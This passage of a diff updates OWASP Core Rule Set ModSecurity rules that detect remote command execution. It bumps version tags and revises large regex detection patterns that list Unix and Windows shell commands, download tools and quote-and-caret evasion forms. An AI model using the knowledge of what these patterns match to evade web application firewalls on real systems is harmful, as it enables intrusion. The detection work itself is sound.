),<>\|]|$))|shark)|u(?:limit(?:[\s\x0b&\),<>\|]|$)|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|p(?:2date(?:[\s\x0b&\),<>\|]|$)|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:(?:[ep]w|gr|rsh)(?:[\s\x0b&\),<>\|]|$)|mdiff|sudo)|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:all|get)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|o(?:ami|is(?:[\s\x0b&\),<>\|]|$)))|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:args|pad|term)(?:[\s\x0b&\),<>\|]|$)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$))|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more))|z(?:athura|(?:c(?:at|mp)|diff|grep|less|more|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|ypper))" \
     "id:932235,\
     phase:2,\
     block,\
@@ -193,9 +194,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -226,9 +228,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -246,7 +249,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932125
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\x0b]*[\s\x0b\"'\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^_a-z]*)\x5c)?[\"\^]*(?:(?:a[\"\^]*(?:c|s[\"\^]*n[\"\^]*p)|e[\"\^]*(?:b[\"\^]*p|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|s[\"\^]*n)|[tx][\"\^]*s[\"\^]*n)|f[\"\^]*(?:[cltw]|o[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*(?:[cr][\"\^]*m|e[\"\^]*x|h[\"\^]*y|i|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|m[\"\^]*o|s[\"\^]*n)|s[\"\^]*e|w[\"\^]*(?:m[\"\^]*i|r))|m[\"\^]*(?:a[\"\^]*n|[dipv]|o[\"\^]*u[\"\^]*n[\"\^]*t)|o[\"\^]*g[\"\^]*v|p[\"\^]*(?:o[\"\^]*p|u[\"\^]*s[\"\^]*h)[\"\^]*d|t[\"\^]*r[\"\^]*c[\"\^]*m|w[\"\^]*j[\"\^]*b)[\"\^]*[\s\x0b,\./;<>].*|c[\"\^]*(?:(?:(?:d|h[\"\^]*d[\"\^]*i[\"\^]*r|v[\"\^]*p[\"\^]*a)[\"\^]*|p[\"\^]*(?:[ip][\"\^]*)?)[\s\x0b,\./;<>].*|l[\"\^]*(?:(?:[cipv]|h[\"\^]*y)[\"\^]*[\s\x0b,\./;<>].*|s)|n[\"\^]*s[\"\^]*n)|d[\"\^]*(?:(?:b[\"\^]*p|e[\"\^]*l|i[\"\^]*(?:f[\"\^]*f|r))[\"\^]*[\s\x0b,\./;<>].*|n[\"\^]*s[\"\^]*n)|g[\"\^]*(?:(?:(?:(?:a[\"\^]*)?l|b[\"\^]*p|d[\"\^]*r|h[\"\^]*y|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|[uv])[\"\^]*|c[\"\^]*(?:[ims][\"\^]*)?|m[\"\^]*(?:o[\"\^]*)?|s[\"\^]*(?:n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*))[\s\x0b,\./;<>].*|e[\"\^]*r[\"\^]*r|p[\"\^]*(?:(?:s[\"\^]*)?[\s\x0b,\./;<>].*|v))|l[\"\^]*s|n[\"\^]*(?:(?:a[\"\^]*l|d[\"\^]*r|[iv]|m[\"\^]*o|s[\"\^]*n)[\"\^]*[\s\x0b,\./;<>].*|p[\"\^]*s[\"\^]*s[\"\^]*c)|r[\"\^]*(?:(?:(?:(?:b[\"\^]*)?p|e[\"\^]*n|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|n[\"\^]*[ip])[\"\^]*|d[\"\^]*(?:r[\"\^]*)?|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r|o)[\"\^]*)?|s[\"\^]*n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*(?:p[\"\^]*a[\"\^]*)?)[\s\x0b,\./;<>].*|c[\"\^]*(?:j[\"\^]*b[\"\^]*[\s\x0b,\./;<>].*|s[\"\^]*n)|u[\"\^]*j[\"\^]*b)|s[\"\^]*(?:(?:(?:a[\"\^]*(?:j[\"\^]*b|l|p[\"\^]*s|s[\"\^]*v)|b[\"\^]*p|[civ]|w[\"\^]*m[\"\^]*i)[\"\^]*|l[\"\^]*(?:s[\"\^]*)?|p[\"\^]*(?:(?:j[\"\^]*b|p[\"\^]*s|s[\"\^]*v)[\"\^]*)?)[\s\x0b,\./;<>].*|h[\"\^]*c[\"\^]*m|u[\"\^]*j[\"\^]*b))(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\x0b]*[\s\x0b\"'\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^_a-z]*)\x5c)?[\"\^]*(?:(?:a[\"\^]*(?:c|s[\"\^]*n[\"\^]*p)|e[\"\^]*(?:b[\"\^]*p|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|s[\"\^]*n)|[tx][\"\^]*s[\"\^]*n)|f[\"\^]*(?:[cltw]|o[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*c[\"\^]*h)|i[\"\^]*(?:[cr][\"\^]*m|e[\"\^]*x|h[\"\^]*y|i|p[\"\^]*(?:a[\"\^]*l|c[\"\^]*s[\"\^]*v|m[\"\^]*o|s[\"\^]*n)|s[\"\^]*e|w[\"\^]*(?:m[\"\^]*i|r))|m[\"\^]*(?:[dpv]|o[\"\^]*u[\"\^]*n[\"\^]*t)|o[\"\^]*g[\"\^]*v|p[\"\^]*(?:o[\"\^]*p|u[\"\^]*s[\"\^]*h)[\"\^]*d|t[\"\^]*r[\"\^]*c[\"\^]*m|w[\"\^]*j[\"\^]*b)[\"\^]*[\s\x0b,\./;<>].*|c[\"\^]*(?:(?:(?:d|h[\"\^]*d[\"\^]*i[\"\^]*r|v[\"\^]*p[\"\^]*a)[\"\^]*|p[\"\^]*(?:[ip][\"\^]*)?)[\s\x0b,\./;<>].*|l[\"\^]*(?:(?:[cipv]|h[\"\^]*y)[\"\^]*[\s\x0b,\./;<>].*|s)|n[\"\^]*s[\"\^]*n)|d[\"\^]*(?:(?:b[\"\^]*p|e[\"\^]*l|i[\"\^]*(?:f[\"\^]*f|r))[\"\^]*[\s\x0b,\./;<>].*|n[\"\^]*s[\"\^]*n)|g[\"\^]*(?:(?:(?:(?:a[\"\^]*)?l|b[\"\^]*p|d[\"\^]*r|h[\"\^]*y|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|[uv])[\"\^]*|c[\"\^]*(?:[ims][\"\^]*)?|m[\"\^]*(?:o[\"\^]*)?|s[\"\^]*(?:n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*))[\s\x0b,\./;<>].*|e[\"\^]*r[\"\^]*r|p[\"\^]*(?:(?:s[\"\^]*)?[\s\x0b,\./;<>].*|v))|l[\"\^]*s|n[\"\^]*(?:(?:a[\"\^]*l|d[\"\^]*r|[iv]|m[\"\^]*o|s[\"\^]*n)[\"\^]*[\s\x0b,\./;<>].*|p[\"\^]*s[\"\^]*s[\"\^]*c)|r[\"\^]*(?:(?:(?:(?:b[\"\^]*)?p|e[\"\^]*n|(?:w[\"\^]*m[\"\^]*)?i|j[\"\^]*b|n[\"\^]*[ip])[\"\^]*|d[\"\^]*(?:r[\"\^]*)?|m[\"\^]*(?:(?:d[\"\^]*i[\"\^]*r|o)[\"\^]*)?|s[\"\^]*n[\"\^]*(?:p[\"\^]*)?|v[\"\^]*(?:p[\"\^]*a[\"\^]*)?)[\s\x0b,\./;<>].*|c[\"\^]*(?:j[\"\^]*b[\"\^]*[\s\x0b,\./;<>].*|s[\"\^]*n)|u[\"\^]*j[\"\^]*b)|s[\"\^]*(?:(?:(?:a[\"\^]*(?:j[\"\^]*b|l|p[\"\^]*s|s[\"\^]*v)|b[\"\^]*p|[cv]|w[\"\^]*m[\"\^]*i)[\"\^]*|l[\"\^]*(?:s[\"\^]*)?|p[\"\^]*(?:(?:j[\"\^]*b|p[\"\^]*s|s[\"\^]*v)[\"\^]*)?)[\s\x0b,\./;<>].*|h[\"\^]*c[\"\^]*m|u[\"\^]*j[\"\^]*b))(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \
     "id:932125,\
     phase:2,\
     block,\
@@ -260,9 +263,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -304,9 +308,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -351,22 +356,23 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 
 
 # [ Unix shell expressions - Bash Tilde expansion ]
+# This rule has a stricter sibling: 932271
 #
 # Detects the following patterns which are common in Unix shell scripts
 # and one-liners:
 #
 # ~+    $PWD
 # ~-    $OLDPWD
-# ~4    fourth directory entry on the stack from the top
 # ~-2   second directory entry on the stack from the top
 # ~+2   second directory entry on the stack from the bottom
 #
@@ -377,7 +383,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932270
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~(?:[\+\-](?:$|[\s\x0b0-9]+)|[0-9]+)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~[\+\-](?:$|[0-9]+)" \
     "id:932270,\
     phase:2,\
     block,\
@@ -391,8 +397,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-rce',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-RCE',\
     tag:'capec/1000/152/248/88',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -457,7 +464,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932250
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\s\x0b&\)<>\|]" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?: